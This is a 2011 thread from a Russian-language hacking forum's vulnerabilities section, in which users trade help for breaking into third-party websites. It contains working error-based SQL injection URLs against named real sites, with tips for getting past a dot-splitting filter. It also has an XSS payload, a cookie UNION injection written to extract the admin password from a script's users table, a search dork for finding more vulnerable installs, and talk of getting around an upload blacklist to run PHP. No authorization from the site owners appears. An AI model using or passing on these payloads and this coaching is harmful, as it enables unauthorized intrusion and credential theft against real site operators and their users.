HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #17311  
Старый 14.06.2011, 21:34
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692
сам не смог ничего сделать, пробовалв sqlhelper'e он тоже ничего не сделал кроме того что определил что это sql union inj

И у меня есть пару вопросов

есть сайт, просканил директории нашол файл .bash_history

открыл его там такое:

Код:
Code:
crontab -e
svs@a18-swforum ~ $ crontab -e
crontabs/svs: Permission denied
ls -la
ps aux
ps aux
ps aux
ps aux
ps aux
crontab -e
man crontab
exit
что это? И если на сайте отображается код JS ну например открываю ссылку site.com/pngfix.js оно мне выдает код скрипта, это нормально?

и последнее:

перебираю страницы на сайте и наткнулся на такое:

http://site.com/?id=7 страница выдала

Код:
Code:
can't select db: Could not locate entry in sysdatabases for database 'название базы'. No entry found with that name. Make sure that the name is entered correctly.
сканил сайт сканером WVS он выдал что здесь http://forum.shock-world.com/journal.php?"onmouseover=prompt(987671)>

XSS но я в них мало шарю, что с нее выжать можно?

вобщем есть за что хвататься?
 
Ответить с цитированием

  #17312  
Старый 15.06.2011, 07:23
freezed
Guest
Сообщений: n/a
Провел на форуме:
31258

Репутация: 7
По умолчанию

Цитата:
Сообщение от FlaktW  
FlaktW said:
В чем причина?
Так выводится:
http://www.liftnn.ru/page.php?path=0.25)+or+(SeLect+count(*)+from+(sele ct+1+UnIoN+select+2+UnIoN+select+3)x%20+group+by+c oncat(version(),floor(rand(0)*2)))%23
Duplicate entry '5.1.41-log1' for key 'group_key'
а, так нет:
http://www.liftnn.ru/page.php?path=0.25)+or+1+group+by+concat((select+/*!table_name*/+/*!from*/+/*!information_schema*/./*!tables*/+/*!limit*/+0,1),floor(rand(0)*2))/*!having*/+count(*)+or+1%23
http://www.liftnn.ru/page.php?path=0.25

там точка используется для разбиения переданного параметра, поэтому второй запрос и не работает

http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+ from+pages+limit+0,1),floor(rand(0)*2))having+min( 0)+or+1%23 работает

http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+ from+sttsnn_lift2.pages+limit+0,1),floor(rand(0)*2 ))having+min(0)+or+1%23 не работает, т.к. точкой разбили запрос

бруть таблицы либо ищи способ обойтись без точки
 
Ответить с цитированием

  #17313  
Старый 15.06.2011, 12:40
Optik-Crack
Guest
Сообщений: n/a
Провел на форуме:
5802

Репутация: 0
По умолчанию

Бывают 2 вида скуль инъекции это обычные и слепые, но все они находятся по разному, киньте ссылки на статьи к способам их нахождения.
 
Ответить с цитированием

  #17314  
Старый 15.06.2011, 12:47
ubi
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме:
278340

Репутация: 0
По умолчанию

Цитата:
Сообщение от Optik-Crack  
Optik-Crack said:
Бывают 2 вида скуль инъекции это обычные и слепые, но все они находятся по разному, киньте ссылки на статьи к способам их нахождения.
SQL injection полный FAQ [Dr.Z3r0]

SQL инъекция (в т.ч. и blind SQL) [kot777]

Быстрый Blind SQL Injection [Qwazar]

А поиск для чего??
 
Ответить с цитированием

  #17315  
Старый 15.06.2011, 17:59
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

Цитата:
Сообщение от Seravin  
Seravin said:
url decode сделал хотя бы...
а вообще предположу что надо либо group_concat либо limit использовать
пробовал group_concat либо limit не выводит ничего
 
Ответить с цитированием

  #17316  
Старый 15.06.2011, 22:31
freezed
Guest
Сообщений: n/a
Провел на форуме:
31258

Репутация: 7
По умолчанию

есть уязвимый сервер, могу заливать все типы файлов кроме:

$Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc', 'pl','bat','exe','dll','reg') ;

пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются

сервер под nginx, поэтому htaccess не пойдет

lfi не нашел

что можно еще поробовать?
 
Ответить с цитированием

  #17317  
Старый 15.06.2011, 23:01
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию

кусок уязвимого кода

Цитата:
Сообщение от None  
";
echo $row["username"];
echo "";
echo $row["visits"];
echo "";
}
echo "";
?>
структура таблицы

Цитата:
Сообщение от None  
CREATE TABLE `tb_users` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(15) NOT NULL,
`password` varchar(100) NOT NULL,
`ip` varchar(15) NOT NULL,
`email` varchar(150) NOT NULL,
`pemail` varchar(150) NOT NULL,
`referer` varchar(15) NOT NULL,
`country` varchar(150) NOT NULL,
`visits` varchar(150) NOT NULL default '0',
`referals` varchar(150) NOT NULL default '0',
`referalvisits` varchar(150) NOT NULL default '0',
`money` varchar(150) NOT NULL default '0.00',
`paid` varchar(150) NOT NULL default '0.00',
`joindate` varchar(150) NOT NULL,
`lastlogdate` varchar(150) NOT NULL,
`lastiplog` varchar(150) NOT NULL,
`account` varchar(150) NOT NULL,
`user_status` varchar(15) NOT NULL default 'user',
KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO_INCREMENT=20 ;
чему должна быть равна переменная $lole для вывода password where username admin?
 
Ответить с цитированием

  #17318  
Старый 15.06.2011, 23:18
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

Цитата:
Сообщение от vaddd  
vaddd said:
кусок уязвимого кода
структура таблицы
чему должна быть равна переменная $lole для вывода password where username admin?
Должно быть mq = off;

Попробуй

Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1

Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).
 
Ответить с цитированием

  #17319  
Старый 15.06.2011, 23:24
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию

Цитата:
Сообщение от Фараон  
Фараон said:
Должно быть mq = off;
Попробуй
Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1
Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).
inurl:advertisewmz.php

уязвимый сценарий referals.php, он в той же папке

спасибо за ответ, попробую завтра

принтабельные цифры будут 2,9?
 
Ответить с цитированием

  #17320  
Старый 15.06.2011, 23:26
ubi
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме:
278340

Репутация: 0
По умолчанию

Цитата:
Сообщение от freezed  
freezed said:
есть уязвимый сервер, могу заливать все типы файлов кроме:
$Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc', 'pl','bat','exe','dll','reg') ;
пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются
сервер под nginx, поэтому htaccess не пойдет
lfi не нашел
что можно еще поробовать?
Попробуй что нибудь из этого

Минифак по загрузке php кода вместо картинок
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ